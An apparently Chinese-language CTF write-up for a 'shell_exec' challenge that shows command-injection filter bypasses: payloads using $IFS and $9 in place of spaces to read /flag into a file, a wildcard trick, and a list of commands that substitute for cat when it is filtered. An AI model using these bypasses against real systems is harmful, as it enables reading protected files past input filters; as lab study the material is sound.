• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

bmzctf刷题 shell_exec

开发技术 开发技术 5小时前 3次浏览

这个绕过方法有好多
我的payload

`cat$IFS$9/flag$IFS>1.txt`

ps:用截断关键字,用$IFS代替空格,用$9做垃圾数据。读取flag保存到1.txt

其他的payload

`head$IFS$9/fla?$IFS$9>1.txt`

ps:用head代替cat

NOTE 可以代替cat的命令

详情可见:CTF中的命令执行绕过方式

tac:从最后一行倒序显示内容,并将所有内容输出

more:根据窗口大小,一页一页的现实文件内容

less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符

head:只显示头几行

tail:只显示最后几行

nl:类似于cat -n,显示时输出行号

tailf:类似于tail -f

sort%20/flag 读文件

dir来查看当前目录文件


程序员灯塔
转载请注明原文链接:bmzctf刷题 shell_exec
喜欢 (0)